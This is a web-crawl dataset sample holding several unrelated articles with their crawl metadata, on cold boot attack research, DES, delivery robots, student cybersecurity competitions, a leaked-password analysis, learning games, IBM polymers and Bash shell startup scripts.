text
stringlengths
234
589k
id
stringlengths
47
47
dump
stringclasses
62 values
url
stringlengths
16
734
date
stringlengths
20
20
file_path
stringlengths
109
155
language
stringclasses
1 value
language_score
float64
0.65
1
token_count
int64
57
124k
score
float64
2.52
4.91
int_score
int64
3
5
A recent study -- conducted by Princeton University and the Electronic Frontier Foundation -- revealed how successful cold boot attacks can be launched on disk encryption. According to the study, most users assume that dynamic random access memory (DRAM) is erased when a computer is shut down. Not true, according to the study. Such data remains visible for several minutes. This time gap provides attackers with a window to access DRAM data. After much experimentation, researchers found a number of methods that could be used to penetrate three widely used disk encryption systems. The full research paper includes a detailed analysis of the exact methods used for extracting information. A short video segment provides a brief overview of the study as well as a demonstration of how the methods can be used. Ed Felten, one of the eight researchers, also followed up with a blog. Here Felten discusses the experiments, answers questions from readers and offers bits of advice to those concerned by the findings of the study.
<urn:uuid:a452dc79-d2d0-4c21-b670-78f944c472d3>
CC-MAIN-2017-04
http://www.govtech.com/security/Report-Successful-Cold-Boot.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280242.65/warc/CC-MAIN-20170116095120-00395-ip-10-171-10-70.ec2.internal.warc.gz
en
0.930237
192
3
3
3.2.1 What is DES? DES, an acronym for the Data Encryption Standard, is the name of the Federal Information Processing Standard (FIPS) 46-3, which describes the data encryption algorithm (DEA). The DEA is also defined in the ANSI standard X3.92. DEA is an improvement of the algorithm Lucifer developed by IBM in the early 1970s. While the algorithm was essentially designed by IBM, the NSA (see Question 6.2.2) and NBS (now NIST; see Question 6.2.1) played a substantial role in the final stages of the development. The DEA, often called DES, has been extensively studied since its publication and is the best known and widely used symmetric algorithm in the world. The DEA has a 64-bit block size (see Question 2.1.4) and uses a 56-bit key during execution (8 parity bits are stripped off from the full 64-bit key). The DEA is a symmetric cryptosystem, specifically a 16-round Feistel cipher (see Question 2.1.4) and was originally designed for implementation in hardware. When used for communication, both sender and receiver must know the same secret key, which can be used to encrypt and decrypt the message, or to generate and verify a message authentication code (MAC). The DEA can also be used for single-user encryption, such as to store files on a hard disk in encrypted form. In a multi-user environment, secure key distribution may be difficult; public-key cryptography provides an ideal solution to this problem (see Question 2.1.3). NIST (see Question 6.2.1) has re-certified DES (FIPS 46-1, 46-2, 46-3) every five years. FIPS 46-3 reaffirms DES usage as of October 1999, but single DES is permitted only for legacy systems. FIPS 46-3 includes a definition of triple-DES (TDEA, corresponding to X9.52); TDEA is "the FIPS approved symmetric algorithm of choice." Within a few years, DES and triple-DES will be replaced with the Advanced Encryption Standard (AES, see Section 3.3).
<urn:uuid:b8f56a6a-8be0-429d-806f-6136ba7db3c9>
CC-MAIN-2017-04
https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/what-is-des.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00385-ip-10-171-10-70.ec2.internal.warc.gz
en
0.940958
466
3.21875
3
Imagine a six-wheeled robot about the size of a suitcase rolling down a bustling city sidewalk and delivering packages to local businesses, elderly, and young professionals short on time. Suddenly, a boy jumps in its path, and the robot veers, missing him by inches. This is not a sci-fi movie scene, rather a likely street view in the not-too-distant future. Robots are marching toward everyday life, hoping to blend into the hustle and bustle of society. But are we really safe with them around? "It is important in terms of social acceptance as well as safety that people are able to predict a robot's behavior," says Matthew Walter, an assistant professor at Toyota Technological Institute in Chicago. Robots are already appearing on sidewalks in select cities. Estonia-based tech startup Starship Technologies just tested its delivery robot four weeks ago in San Francisco. The turnover of professional service robots, such as those in healthcare and logistics, will grow to $23.1 billion for the period 2016-2019, compared to $4.6 billion in 2015, according to the latest report by the International Federation of Robotics. The unpredictable nature of sidewalks presents an especially difficult challenge for robots, from inattentive adults staring into phones to absent-minded children playing imaginary games to harried professionals rushing out of buildings. Then there are critical moments of interaction with car drivers and bicyclists. "I think probably one of the biggest challenges is dealing with pedestrians, navigating around pedestrians, and predicting their behavior," Walter says. All of which begs the question: How quickly can robots respond to encounters with humans? Starship's robot travels at pedestrian speed – about four miles per hour – and uses computer-vision technology, such as GPS and proprietary mapping, to pinpoint its location to the nearest inch. It has a sophisticated obstacle avoidance system that acts as a "bubble of awareness" around the robot preventing it from bumping into things, says Henry Harris-Burland, marketing and communications manager at Starship. "Let's say the system fails," he says. "The worst thing that can happen is the robot just comes to a slow stop. It stops in 30 centimeters, which is a very safe stop distance." Perhaps more challenging, humans need to learn how to interact with a robot, too. A pedestrian, for instance, crosses the road safely after making eye contact with a car driver because both sides have an established social contract that the pedestrian goes first. Such unspoken social contracts would be difficult to achieve with robots. That's not to say delivery robots are too dangerous for their own good. They offer an incredibly valuable service, such as delivering food to the elderly who have a tough time venturing out in bad weather (although snow-covered stop signs and traffic lights might confuse robots). Most signs point to a future with robots, which isn’t a bad thing as long as people don't get hurt in the name of progress, says at least one casual observer. "I think it would be a very efficient way to get things quickly," says Samir Patel, a law school undergraduate at Washington University in St. Louis. "Automated things are always a little bit better, but the only concern I might have is people's safety on the sidewalks."
<urn:uuid:4f68f15d-9149-440b-b0a1-c5d770c59abe>
CC-MAIN-2017-04
http://www.ioti.com/iot-trends-and-analysis/are-we-safe-robots
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00201-ip-10-171-10-70.ec2.internal.warc.gz
en
0.96179
673
3.0625
3
“Learning is not the product of teaching. Learning is the product of the activity of learners.” – John Holt My last blog, A call to action: Promoting computer science in schools, challenged cybersecurity professionals to work with their local school districts to help improve computing education. It’s a start. Education is more than just classrooms and teachers. It’s active learners working to improve their knowledge, skills, and abilities. It’s mentors guiding both students and teachers. It’s making learning fun. All of these reinforce education. Call to Action – Part 2: We need cybersecurity professionals to mentor young minds entering our profession. Why you need to get involved: - The students, teachers, and parents need you (see my previous blogs). - You can get Continuing Professional Education (CPE) credits for volunteer work. ISC2, ISACA, and many other cybersecurity certifying bodies recognize mentoring as a way of enhancing your own education. - You will make a difference in a young person’s life. Kids need mentors to guide and direct them. There’s something powerful when you directly impact someone as a mentor. See information below on how you can get involved in your local community. Competitions, clubs, and conferences allow students to go beyond the classroom to learn cybersecurity and develop professional traits. There are multiple competitions at the local and national levels promoting learning. They each have the goal of encouraging professional development and cybersecurity education outside of the traditional classroom. CyberPatriot is the National Youth Cyber Education Program. In its eighth year, CyberPatriot was conceived by the Air Force Association (AFA) to inspire high school students toward careers in cybersecurity or other science, technology, engineering, and mathematics (STEM) disciplines critical to our nation's future. Evan Dygert, the 2014-2015 US CyberPatriot Mentor of the Year shows the value of the program for both the students and the mentors. “It’s just fun. Watching the students learn about something that will have an impact on their careers, since most are interest in going into the cybersecurity career field. “ ”Don’t under estimate the impact you can have on these kids. Students are qualified to work in the field, but just need the direction. “ [Full disclosure: I’m the 2013-2014 CyberPatriot Mentor of the Year.] The 2015-2016 competition season is just getting started. To learn more, watch the YouTube videos: Looking for an action-packed STEM activity? Check out CyberPatriot today! and CyberPatriot and CYBER++, Aspiring Students to Learn and see the CyberPatriot website and volunteer page. There are teams throughout the US needing mentors. MITRE / ISC2 CTF MITRE Cyber Academy promotes the growth of cybersecurity skills. Using the motto of “Learn, Practice, Compete,” they provide a portal for high school and undergraduate college students and teachers to use publicly available training resources to grow fundamental abilities in essential cybersecurity topics. The MITRE / ISC2 Capture the Flag CTF competition is an annual challenge for students to practice their hacking skills in multiple, interactive, online challenges. In its 5th year, this challenge has teams throughout the US and is looking to have over 100 competitors this year. If you’re interested in participating in the 2015 CTF competition, you need to act fast. It will be held September 11-12, 2015. Even if you don’t make the competition, the free training resources and past competitions are available. The National Collegiate Cyber Defense Competition (NCCDC) provides college students the ability “to apply the theory and practical skills they have learned in their course work in a competitive environment.” A benefit of this and the other competitions is the fostering of teamwork, ethical behavior, technical skills, and communications. The Cybersecurity Competition Federation (http://cyberfed.org/) “is an association of academic, industry and government organizations with a common interest in supporting cybersecurity competitions and the competitors they serve.” Dr. Dan Manson, a Professor and Department Chair in Computer Information Systems at California State Polytechnic University, Pomona, directs this initiative. He sees cybersecurity competitions as “a learning sport providing real world challenges leading directly into employment.” He echoes the value in taking learning outside of the traditional classroom. “Something magical happens in these competitions. The students spend more time preparing than any class they may take. It’s also a true co-ed team competition sport where diversity and differences are a strength.” I challenge you to get involved in these activities. EACH NEEDS YOU TO MAKE IT EFFECTIVE. Educate yourself on these opportunities. Check out the websites and reach out with your questions. Sign up and be an active part of your community. You will be richly rewarded when you do, knowing you’re not only helping your own career, but more importantly, making a difference in a young person’s life. Next time I’ll discuss more, positive learning opportunities found in kid-centered conferences. I look forward to your comments, ideas, and questions. This article is published as part of the IDG Contributor Network. Want to Join?
<urn:uuid:e3887d84-96b2-4a87-89d8-468f77eed13e>
CC-MAIN-2017-04
http://www.csoonline.com/article/2978865/it-careers/cybersecurity-competitions-make-a-difference.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280900.71/warc/CC-MAIN-20170116095120-00321-ip-10-171-10-70.ec2.internal.warc.gz
en
0.931586
1,111
2.65625
3
According to a 2014 Gallup survey, Americans fear being hacked more than they fear any other crime. We’re worried about our credit card information, our medical records, our email, and our personal information – and with good reason. In 2014, more than one billion personal records were illegally accessed. In 2016, Yahoo disclosed that hackers stole personal information from more than 500 million accounts. So the question is: How vulnerable are you? Are your passwords secure? Is your personal information under wraps? To gain some insight, we examined 50,000 emails and passwords that were leaked online. We analyzed passwords for root words and easy-to-guess elements. Here’s what we learned. The 30 Most Common Passwords In the 50,000 passwords we analyzed, the most commonly used words were love, star, girl, angel, rock, miss, hell, Mike, and John. Because one of the ways hackers steal passwords is by using commonly used words, we recommend steering clear of these popular terms or even better, using nonsense words and letter-number combinations. So, who’s vulnerable to these hacks? Using Names in Your Passwords Is a No-No Perhaps unsurprisingly, the most common names of those hacked are also … well, some of the most common names in America – with Mike/Michael, Chris/Christopher, John/Jonathan, and Dave/David leading the pack. Men were slightly more prone to being hacked, based on our info. And interestingly, those aged 25 to 34 were four times more likely to be hacked than any other demographic. They also happen to be the men most likely to be named Mike, Chris, John, or Dave. According to Business Insider, millennials grew up with a third parent: The Internet. But perhaps they weren’t spoon-fed online security tips from an early age. And, interestingly, some states are more secure than others. Are Some States More Secure Than Others? According to the data, the answer is yes. Hawaii was home to most of our leaked passwords, with an average of 28.71 leaks per 100,000 residents. That’s more than six times the national average (4.67) and a 58 percent increase from the next riskiest state (California, at 18.18). Of course, Hawaii isn’t the only state with a higher-than-average risk. Based on our analysis, 15 states carry that distinction. Hawaii tops the list, but California and Nevada are more than double the national average, and Washington and New York aren’t far behind. Password Faux Pas: Who’s Using Their Own Names? If using personal data in a password is a big no-no, using your own name is an even worse mistake. Granted, there are still worse passwords out there. Some people still think 1234567890 is a good choice. If it’s not good enough for your luggage, why would it be good enough for your bank account? Although many users know that name-password combinations are insecure, more than 42 percent of those 50,000 leaked passwords still included usernames, passwords, or real names. The worst offenders? People who are named Amy, Lisa, Scott, Mark, or Laura. Of course, while Amys and Lisas may be the worst offenders in the name-in-my-password bunch, overall, men are actually more likely than women to fall into this trap – 20 of the top 25 biggest offenders on the list were typical male names. Perhaps unsurprisingly, the most common names of those hacked are also more common names in general. John, Michael, and Joseph are among the most common first names in the country. Is Your Email Provider Secure? When it comes to leaked passwords, which email providers have had the most breaches? Based on our data, the answer is Yahoo by a large margin. (Yahoo had almost three times as many hacked emails as any other email provider on our list.) The next most commonly hacked email provider was Hotmail, followed by Gmail. The least hacked email provider was internet veteran AOL, despite the fact that AOL users were actually the most likely of any users on our list to use passwords containing part of their name. Keeping Your Emails and Data Safe The truth is that hacking techniques are more sophisticated than ever before. According to cybersecurity expert Misha Glenny, there aren’t any companies that haven’t been hacked – there are just companies that know about the hacks and companies that don’t. So what can you do? First, you can learn from the mistakes in the data we examined. Don’t use your name, your pet’s name, or your best friend’s name in your password. Don’t use common words. Instead, come up with random, difficult-to-guess combinations of letters, numbers, and characters. Or even better, use a trusted password service like LastPass. Change your passwords often, pay attention when a service you use is hacked (when the press reports a Yahoo hack, it’s time to change your password), and educate yourself about the latest security options. And of course, you can always take a training course on security to better understand how to protect yourself. For this blog post, we searched the web for leaked emails and passwords to find out more about the demographics of people who have had their information revealed on the internet. We analyzed about 50,000 emails using the fullcontact.com API, which gave us information on users’ genders, ages, names, and locations. We then analyzed passwords using a dictionary list to determine which root words were most common among these passwords. In addition, we cross-referenced user passwords – matching username, first name, or last name – to determine if some form of “common knowledge” was used within a user’s password. Share this with your followers in a non-commercial way, and connect it back to the original article.
<urn:uuid:8ca95402-12b3-47e1-9096-2e0fca42480a>
CC-MAIN-2017-04
https://blog.cbtnuggets.com/2016/12/leaky-logins-50000-passwords-exposed/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279169.4/warc/CC-MAIN-20170116095119-00534-ip-10-171-10-70.ec2.internal.warc.gz
en
0.92676
1,261
2.59375
3
The Importance of Games in Learning More than any other, the “millennial” generation that is coming into the workforce has been raised on games. From “Grand Theft Auto” to “Mario Kart”, from “World of Warcraft” to “Gears of War,” members of this cohort eat, sleep, live and breathe games of all kinds. Gen Xers can game with the best of them too, having grown up on classics such as “Pac-Man,” “Q*Bert” and “Asteroids.” And a few baby boomers also have caught on to video games, although generally not to the extent that the successive generations have. Gaming truly has become an industry — and not just in terms of video games. Indeed, billions of dollars in profits have been generated through games of chance found in casinos all over the country. In particular, Texas Hold ’Em poker has caught on not only as a popular card game but also as a spectator sport of sorts. With games associated so closely with leisure, it’s not hard to understand why people who run training programs might not immediately consider them as a tool for study. After all, games are just diversionary and can’t convey much in the way of meaningful knowledge, right? Not so. While no educational strategy should rest entirely on games, these platforms can bring a lot to the training table. For one thing, they’re an engaging and fun way to transmit information. What’s more, younger professionals are beginning to expect and even demand these kinds of training experiences. Because of their backgrounds, they respond well to these offerings, and vendors would do well to consider adding training games to their suite of products, if they haven’t already. The market for training games is still somewhat sparse, so don’t expect to find a whole lot out there right now. There are a few reasons for this. The first — the mindset of “Games are for fun, not for learning” — was alluded to earlier. But even if games were universally accepted as a training tool, it wouldn’t necessarily lead to many more of them. They’re not easy to develop, especially video games, which involve substantial time, money and effort. And for training providers, keeping up with the rapidly changing world of certification is key. A notable exception is Cisco Systems, which has rolled out a series of learning games designed to help IT pros learn fundamental IT skills and concepts such as binary language and routing and switching terminology. While these don’t always align directly to the company’s certification programs, they are a useful tool for introducing novices to new areas of technology that Cisco’s credentials cover. As design tools such as Flash become more robust and easy to use, you might see a greater proliferation of these learning games. If you’re looking to get into gaming for the purposes of training, though, you don’t have to wait for vendors to roll out these programs — on your own, you can come up with games that help you learn the subjects a certification covers. Should you opt to do it yourself, there are a couple of suggestions for creating a good training game. First, make it multiplayer. Involve colleagues who are on a similar career path and are pursuing the same certification or at least an analogous one. The competition will make it fun and help get everyone involved to participate fully. Also, feel free to mine the gaming landscape for ideas. You easily could take the format and rules from games such as Trivial Pursuit, Jeopardy, Taboo and even Pictionary and incorporate technical terms and concepts into those.
<urn:uuid:b19ce74a-06d9-4bf8-99bb-465db267b1b9>
CC-MAIN-2017-04
http://certmag.com/the-importance-of-games-in-learning/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279933.49/warc/CC-MAIN-20170116095119-00442-ip-10-171-10-70.ec2.internal.warc.gz
en
0.966237
775
3
3
IBM scientists have invented a new class of experimental polymers that are exceptionally lightweight, remarkably strong, and even self-healing, which they say could transform manufacturing and fabrication in the transportation, aerospace, and microelectronics industries. IBM’s research division published their findings on the novel polymers in the journal Science on Thursday with collaborators UC Berkeley, Eindhoven University of Technology and King Abdulaziz City for Science and Technology (KACST), Saudi Arabia. The discovery was based upon a ‘computational chemistry’ hybrid approach that combines lab experimentation and synthetic polymer chemistry with advanced supercomputing. IBM reports that the new materials are the first to demonstrate resistance to cracking, strength higher than bone, as well as being self-healing and completely recyclable. Polymers – long chains of molecules that are connected through chemical bonds – are everywhere. From clothing to drink bottles, paints, food packaging and many building materials, polymers are a critical component in most modern technologies. Yet as crucial as these substances are, today’s polymers are lacking in some key ways. Such shortcomings include poor crack resistance, insufficient thermal resistance, and lack of recyclability. By addressing these limitations, IBM’s new polymer class could be poised for transformative uses in a wide array of fields. The polymers are also tunable, which means that specific attributes can be emphasized by how much heat is used in the curing process and through the addition of filler materials. Using high heat in tandem with reinforcing fillers, IBM researchers were able to create super-strong polymers that they nicknamed “Titan.” Such materials behave a lot like metal, but are more lightweight, making them good candidates for use in airplane and cars. Another process uses low heat curing to form elastic gels that are strong yet flexible like a rubber band. Called “Hydro” by IBM insiders, this type of polymer is “self healing” as a result of the hydrogen-bonding interactions in the hemiaminal polymer network. “Probably the most unexpected and remarkable characteristic of these gels,” states IBM, “is that if they are severed and the pieces are placed back in proximity so they physically touch, the chemical bonds are reformed between the pieces making it a single unit again within seconds.” Potential applications would be ones that require reversible assemblies, such as drug cargo delivery. The ability to selectively recycle a component would also be a boon to the semiconductor industry where defective parts could be reused as a base material, helping to converse expensive resources. According to reporting from The New York Times, this discovery was several decades in the making. The IBM scientists say that that’s how long it’s been since a distinctly new polymer class was invented. And apparently, it all started with an error. IBM laboratory research chemist Jeannette M. Garcia was cooking up a recipe for a recyclable plastic and inadvertently omitted one of the steps. She later returned to find a hard white plastic that was impervious to grinding and hammering. Using computer modeling on powerful supercomputers, the researchers discovered a new polymer family with two primary types, one “soft and gooey” and the other very rigid, dubbed “Hydro” and “Titan.” “New materials innovation is critical to addressing major global challenges, developing new products and emerging disruptive technologies,” said James Hedrick, Advanced Organic Materials Scientist, IBM Research. “We’re now able to predict how molecules will respond to chemical reactions and build new polymer structures with significant guidance from computation that facilitates accelerated materials discovery. This is unique to IBM and allows us to address the complex needs of advanced materials for applications in transportation, microelectronic or advanced manufacturing.”
<urn:uuid:7d00f89c-6b41-4efd-a254-a41e76b16b79>
CC-MAIN-2017-04
https://www.hpcwire.com/2014/05/15/supercomputing-super-plastics/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00258-ip-10-171-10-70.ec2.internal.warc.gz
en
0.946048
792
3.75
4
If you work with a tool long enough, you master its purpose. Moreover, the tool becomes an extension of yourself. Think of Gustav Klimt's brush, Louis Armstrong's trumpet, and Mark Twain's turn of phrase. If you're a virtuoso, your "tools of the trade" effortlessly channel your intent, spirit, and expression to your medium. By now, I hope your skills have reached those of a UNIX® acolyte. You practice your command-line katas. You consult the omniscient oracle of man when you crave knowledge. And you craft command combinations that perform sheer alchemy on data. You're at ease at the command line, and the shell feels comfortable and familiar. The next stage in your apprenticeship, Grasshopper, is to make the shell your own. The great and mighty shell You've already seen many techniques to customize your shell environment: - You can choose the UNIX shell you'd like to use. The Bourne shell is a stalwart; others, such as the Z shell, offer novelties and conveniences that you may find helpful. To find the shells available on your UNIX system, use the command cat /etc/shells. To change your shell to any of the shells listed, use the chshcommand. Here's an example to change to /bin/zsh, the Z shell. (Type the text shown in bold.) $ cat /etc/shells /bin/bash /bin/csh /bin/ksh /bin/sh /bin/tcsh /bin/zsh $ chsh -s /bin/zsh - You can create short aliases to stand in for lengthy commands. - Environment variables, such as PATH (which controls where to search for programs) and TZ (which specifies your time zone), persist your preferences and affect all the processes you launch. PATH is especially useful. For example, if you want or need to run a local, enhanced version of Perl, you can alter your PATH to prefer /usr/local/bin/perl instead of the (typical) standard version found in /usr/bin/perl. UNIX applications often use environment variables for customization, too. For instance, if your terminal (or emulator) is capable, you can colorize the output of ls(list directory contents) with the environment variables CLICOLOR and LSCOLORS. - You can retain and recall command lines through the shell's built-in command history. Command histories conserve typing, allowing you to re-run an earlier command. Many shells also allow on-the-fly modification of a previous command to create a new command. For example, the Bash shell uses the caret ( ^) character to perform substitutions: $ ls -l heroes.txt -rw-r--r-- 1 strike strike 174 Mar 1 11:25 heroes.txt $ ^heroes^villains ls -l villians.txt villians.txt Here, the quirky command line ^heroes^villainssubstitutes the word villains for heroes in the immediately previous command (the default, if a numbered command in the history list isn't provided) and runs the result, ls -l villians.txt. Consult your shell's documentation for its syntax for command-line substitutions. - You can write shell scripts to (re-)perform complex operations if the existing UNIX utilities and your shell's built-in features lack a feature you'd like to use regularly. As you'll see in an upcoming "Speaking UNIX" article, you can also download and build an enormous number of additional UNIX utilities, typically provided as open source. In fact, with Google or Yahoo! and a few minutes of time, you can usually and readily find and download a suitable solution rather than create your own. (Be lazy! Spend your bonus free time watching clouds.) Of course, with so many options for fine-tuning your shell, it would be nice if you could persist your preferences and re-use those settings time and again, from shell to shell (say, in different X terminal windows), session to session (when you log out and return to log in again), and even across multiple machines (assuming that you use the same shell on multiple platforms). Shell startup scripts provide this endurance. When a shell starts and as it terminates, the shell executes a series of scripts to initialize and reset your environment, respectively. Some startup scripts are system-wide (your systems administrator configures them), and others are yours to customize freely. Startup scripts aren't like Microsoft® Windows® INI files. As the name implies, startup scripts are true shell scripts—those little programs you write to achieve some work. In this case, the shell scripts run whenever the shell starts or terminates and affect the shell environment. Start me up! Typically, each shell provides for several shell startup scripts, and each shell dictates the order in which the scripts run. At a minimum, you can expect a system-wide startup file and a personal (per-user) startup file. Think of the entire shell startup sequence as a kind of cascade: The effects of running (potentially) multiple scripts are cumulative, and you can negate or alter parameters set early in the sequence in a subsequent script. For example, your systems administrator might set a helpful default shell prompt for the entire system—something that includes your user name, current working directory, and command history number, for instance—in the system-wide shell startup file. However, you can override this file by resetting the shell prompt to your liking in your own startup script. Otherwise, if you don't alter a system-wide setting, it persists in your shell and environment. Typically, the earliest startup scripts are system-wide, such as /etc/profile, and your systems administrator manages them. System-wide startup files aren't intended as an intrusion, but rather facilitate the use of resources specific to that system. For example, if your system administrator prefers that you use a newer version of the Secure Shell (SSH) utility because it addresses a known security flaw, he or she might set each user's initial PATH variable to /usr/local/bin:/bin:/usr/bin, which prioritizes executables found in /usr/local/bin. (If the command isn't found in /usr/local/bin, the shell continues its scan in /usr/bin.) System-wide startup files are also used to name printers, display bulletins about planned downtime, and provide new users with reasonable shell defaults. (Don't haze the newbies.) After the system-wide script (or scripts) runs, the shell runs user-specific startup scripts. The per-user files are the appropriate places to keep your favorite aliases, environment settings, and other preferences. Planning for the big Bash The number and names of the shell startup scripts vary from one shell to another. Let's look at the startup sequence of the Bash shell, /bin/bash. The Bash shell is found on all flavors of UNIX and Linux®, and it is typically the default shell of new systems and users. It's also representative of many other shells and thus serves as a good demonstration. (If you use another shell, consult its documentation or man page for the names and processing order of its startup scripts.) Bash searches for six startup scripts, but each of those scripts is optional. Even if all six scripts exist and are readable, Bash executes only a subset of the six in any situation. Bash first executes /etc/profile, the system-wide startup file, if that file exists and the user can read it. After reading that file, Bash looks for ~/.bash_profile, ~/.bash_login, ~/.profile, and ~/.bashrc—in that order—where ~ is the shell's abbreviation for the user's home directory (also available as $HOME). If you exit Bash, the shell searches for Which of the six files executes depends on the "mode" of the new shell. A shell can be a login shell, and it might or might not be interactive. (A login shell is also an interactive shell; however, you can force a non-interactive shell to behave like a login shell. More on that later.) In UNIX days of yore (a scant two decades ago), you typically accessed a UNIX machine through a dumb terminal. You would type your user ID and password at the login prompt, and the system would spawn a new login shell for your session. In this environment, a login shell was differentiated from other shell instances (such as those running a shell script) by name: The process name of each login shell was prefixed with a hyphen, as in -bash. This special name—a longtime UNIX artifact—tells the shell to run any special configuration for An interactive shell is easier to explain: A shell is interactive if it responds to your input (standard input) and displays output (to standard out). Today, the X terminal has replaced the dumb terminal, but the convention and paradigm of shell modes remain. Usually, X terminal spawns Bash as which forces Bash to perform the login startup sequence. In the case of Bash, an interactive login shell runs /etc/profile, if it exists. (A non-interactive shell also runs /etc/profile if Bash is invoked as bash --login.) Next, the interactive login shell looks for ~/.bash_profile and executes this script if it exists and is readable. Otherwise, the shell continues, trying to execute ~/.bash_login. If the latter file doesn't exist or is unreadable, Bash finally attempts to execute ~/.profile. Bash runs only one personal startup file—the startup sequence stops immediately afterward. When a Bash login shell exits, it executes ~/.bash_logout. If the Bash shell is interactive but not a login shell, Bash attempts to read ~/.bashrc. No other files are executed. If the Bash shell is non-interactive, it expands the value of the BASH_ENV environment variable and executes the file named. Of course, you can provide additional settings by calling your own scripts from within Bash's standard scripts. The special shell abbreviation (or its synonym source) executes another shell script. For example, if you want to share the settings in ~/.bashrc between interactive login shells and interactive non-login shells, place the command: in ~/.bash_profile. When the shell encounters the dot command, it immediately executes the named shell script. Peering into the shell The best way to explore the startup sequence is to create some simple shell startup files. For example, if you run the ssh farfaraway ls command, is the remote shell that SSH spawns on the remote system named farfaraway a login shell? An interactive shell? Let's find out. Listings 1, 2, 3, and 4 show sample /etc/profile, ~/.bash_profile, ~/.bashrc, and ~/.bash_logout files, respectively. (If these files already exist, make backups before you continue with this exercise. You need superuser privileges on your machine to change /etc/profile.) Use your favorite text editor to create the files as shown. Listing 1 shows a sample /etc/profile script. This file is the first startup file to run (if it exists and is readable). Listing 1. Sample /etc/profile file echo "Executing /etc/profile." PATH="/bin:/sbin:/usr/bin:/usr/sbin" export PATH Listing 1 echoes a message as the script begins and sets a minimal PATH variable. Again, this file runs if the shell is an interactive login shell. For example, launch a new X terminal. You should see something like this: Last login: Tue Apr 17 21:06:23 on ttyp1 Executing /etc/profile (Interactive, login shell) Executing /Users/strike/.bash_profile (Interactive, login shell) Including /Users/strike/.aliases strike @ blackcat 1 $ Good! That's the predicted sequence when launching a new login shell in an X terminal. Notice the shell prompt: It reflects the user name, the short hostname (everything before the first dot), and the command number. If you type the prompt, you should see this: strike @ blackcat 31 $ logout Executing /Users/strike/.bash_logout (Interactive, login shell) As described, the interactive login shell runs ~/.bash_logout. Listing 2 shows a sample ~/.bash_profile file. This file is one option for customizing your shell at startup. Listing 2: Sample ~/.bash_profile file echo "Executing $HOME/.bash_profile" echo '(Interactive, login shell)' PS1='\u @ \h \# \$ ' export PS1 PAGER=/usr/bin/less export PAGER . .aliases Next, let's see what happens when you launch a new shell from the prompt. The new shell is interactive, but it's not a login shell. According to the rules, ~/.bashrc is the only file expected to run. strike @ blackcat 1 $ bash Executing /Users/strike/.bashrc (Interactive shell) blackcat:~ strike$ And, in fact, ~/.bashrc is the only file to execute. The proof is in the prompt—the prompt at bottom is the default Bash prompt, not the one defined in ~/.bash_profile. To test the logout script, type exit (you cannot type logout in a non-login shell). You should see: blackcat:~ strike$ exit exit Executing $HOME/.bash_logout (Interactive, login shell) strike @ blackcat 2 $ As an interactive login shell terminates, it executes ~/.bash_logout. You might use this feature to remove temporary files, copy files as a simple method of backup, or perhaps even launch rsync to distribute any changes made in this most current session. Listing 3 shows a sample ~/.bashrc file. This file is the initialization file for non-interactive Bash shell instances. Listing 3: Sample ~/.bashrc file echo "Executing $HOME/.bashrc" echo "(Interactive shell)" PATH="/usr/local/bin:$PATH" export PATH Here's another experiment: What kind of shell do you get when you run SSH? Let's try two variations. (You can simply use SSH to get back to your local machine—it works the same as if you were running SSH from a remote machine.) First, use SSH to log in to the remote machine: strike @ blackcat 1 $ ssh blackcat Last login: Tue Apr 17 21:17:35 2007 Executing /etc/profile (Interactive, login shell) Executing /Users/strike/.bash_profile (Interactive, login shell) Including /Users/strike/.aliases strike @ blackcat 1 $ As you might expect, running SSH to access a remote machine launches a new login shell. Next, what happens when you run a command on the remote machine? Here's the answer: strike @ blackcat 3 $ ssh blackcat ls Executing /Users/strike/.bashrc (Interactive shell) villians.txt heroes.txt Running a command remotely using SSH spawns a non-login interactive shell. Why is it interactive? Because the standard input and the standard output of the remote command are tied to your keyboard and display, albeit through the magic of SSH. Listing 4 shows ~/.bash_logout. This file runs as the shell terminates. Listing 4: Sample ~/.bash_logout file echo "Executing $HOME/.bash_logout" echo "(Interactive, login shell)" Helpful tips for startup files The more you use the shell, the more you can benefit from persisting your preferences in startup files. Here are some helpful tips and suggestions for organizing your Bash settings. (You can apply similar strategies to other shells.) - If you have settings (for example, PATH) that you want to use in every shell (regardless of its mode), place those settings in ~/.bashrc and sourceto access the file from ~/.bash_profile. - If you have accounts on multiple machines (and your home directory isn't shared among them through the Network File System [NFS]), use rsync to keep your shell startup files in sync across all machines on the network. - If you apply certain preferences depending on the host you're using—say, a different PATH if one system has special resources—place those settings in a separate file and use sourceto access it during shell startup. If you choose to use rsync to manage your files, omit the host-specific file from the file distribution list. Of course, you can also create a global script and use conditionals and the environment variable HOSTNAME to choose the appropriate settings. (HOSTNAME is set automatically by the shell and captures the fully qualified host name.) For example, here's a useful snippet commonly found in startup files: case $HOSTNAME in lab.area51.org) PATH=/opt/rocketscience/bin:$PATH PS1='\u @ \h \# \$ ' export $PS1;; alien.area51.org) PATH=/opt/alien/sw/bin:$PATH;; saucer*) PATH=/opt/saucer/bin:$PATH PAGER=less export $PAGER;; *) PATH=/usr/local/bin:$PATH esac export $PATH The construct here is a switch statement to compare the value of $HOSTNAME against four possible values: lab.area51.org, alien.area51.org, a pattern that matches any hostnames that begin with the literal string saucer*(a hostname such as saucer-mars would match; a hostname such as sauce.tomato.org would not), and everything else. Here, in the case of Bash, the asterisk (*) is interpreted as a shell operator, not as a regular expression operator. When a match is made against one of the patterns, the statements associated with that pattern execute. Unlike other switch statements, Bash's case runs one set of statements only. Finally, look at the shell startup files of other users for inspiration and to save perspiration. (Some users protect these files and their home directory, though, which precludes you from browsing.) Does Joe have a cool, useful prompt? Ask how to implement the same thing. Does Jeanette have extensive keyboard accelerators or a great collection of environment variables to eke out special features from utilities? Chat with her about her about recipes. The best source of ideas and code comes from experienced practitioners of the command line. Customizing your shell Tweakers and modders, unite! You can customize your shell extensively, and after you find a setting or series of settings you like, save them in a startup file to re-use again and again. Use rsync or a similar tool to propagate your environment from one machine to another. Your lesson is done. Time for more katas. - Speaking UNIX: Check out other parts in this series. - Check out other articles 